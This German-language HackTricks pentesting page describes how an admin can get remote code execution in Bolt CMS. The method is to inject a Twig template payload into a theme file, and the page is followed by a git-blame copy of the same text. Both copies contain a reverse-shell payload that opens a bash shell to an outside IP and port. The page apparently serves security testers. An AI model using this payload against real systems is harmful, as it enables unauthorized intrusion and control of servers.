hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md

# Bolt CMS

{% hint style="success" %}
Lerne & übe AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Lerne & übe GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Überprüfe die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)!
* **Tritt der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folge** uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Teile Hacking-Tricks, indem du PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos einreichst.

</details>
{% endhint %}

## RCE

Nach dem Login als Admin (gehe zu /bot, um die Anmeldemaske zu erreichen), kannst du RCE in Bolt CMS erhalten:

* Wähle `Konfiguration` -> `Konfiguration anzeigen` -> `Hauptkonfiguration` oder gehe zu dem URL-Pfad `/bolt/file-edit/config?file=/bolt/config.yaml`
* Überprüfe den Wert des Themas

<figure><img src="../../.gitbook/assets/image (771).png" alt=""><figcaption></figcaption></figure>

* Wähle `Dateiverwaltung` -> `Vorlagen anzeigen & bearbeiten`
* Wähle das im vorherigen Schritt gefundene Basis-Thema (`base-2021` in diesem Fall) und wähle `index.twig`
* In meinem Fall ist dies im URL-Pfad /bolt/file-edit/themes?file=/base-2021/index.twig
* Setze dein Payload in diese Datei über [Template Injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), wie: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* Und speichere die Änderungen

<figure><img src="../../.gitbook/assets/image (948).png" alt=""><figcaption></figcaption></figure>

* Leere den Cache in `Wartung` -> `Cache leeren`
* Greife erneut als regulärer Benutzer auf die Seite zu, und das Payload sollte ausgeführt werden

{% hint style="success" %}
Lerne & übe AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Lerne & übe GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Überprüfe die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)!
* **Tritt der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folge** uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Teile Hacking-Tricks, indem du PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos einreichst.

</details>
{% endhint %}
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00			`# Bolt CMS`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`{% hint style="success" %}`
			`Lerne & übe AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Lerne & übe GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`<details>`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-02 18:28:27 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`* Überprüfe die [Abonnementpläne](https://github.com/sponsors/carlospolop)!`
			`* Tritt der 💬 [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folge uns auf Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Teile Hacking-Tricks, indem du PRs zu den [HackTricks](https://github.com/carlospolop/hacktricks) und [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos einreichst.`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`{% endhint %}`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
			`## RCE`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`Nach dem Login als Admin (gehe zu /bot, um die Anmeldemaske zu erreichen), kannst du RCE in Bolt CMS erhalten:`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			* Wähle `Konfiguration` -> `Konfiguration anzeigen` -> `Hauptkonfiguration` oder gehe zu dem URL-Pfad `/bolt/file-edit/config?file=/bolt/config.yaml`
			`* Überprüfe den Wert des Themas`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:18:38 +00:00			`<figure><img src="../../.gitbook/assets/image (771).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			* Wähle `Dateiverwaltung` -> `Vorlagen anzeigen & bearbeiten`
			* Wähle das im vorherigen Schritt gefundene Basis-Thema (`base-2021` in diesem Fall) und wähle `index.twig`
			`* In meinem Fall ist dies im URL-Pfad /bolt/file-edit/themes?file=/base-2021/index.twig`
			* Setze dein Payload in diese Datei über [Template Injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), wie: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']\|filter('system')}}`
			`* Und speichere die Änderungen`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 22:18:38 +00:00			`<figure><img src="../../.gitbook/assets/image (948).png" alt=""><figcaption></figcaption></figure>`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			* Leere den Cache in `Wartung` -> `Cache leeren`
			`* Greife erneut als regulärer Benutzer auf die Seite zu, und das Payload sollte ausgeführt werden`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`{% hint style="success" %}`
			`Lerne & übe AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Lerne & übe GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`<details>`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`<summary>Support HackTricks</summary>`
arte 2024-01-02 18:28:27 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`* Überprüfe die [Abonnementpläne](https://github.com/sponsors/carlospolop)!`
			`* Tritt der 💬 [Discord-Gruppe](https://discord.gg/hRep4RUj7f) oder der [Telegram-Gruppe](https://t.me/peass) bei oder folge uns auf Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Teile Hacking-Tricks, indem du PRs zu den [HackTricks](https://github.com/carlospolop/hacktricks) und [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repos einreichst.`
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 11:30:53 +00:00			`{% endhint %}`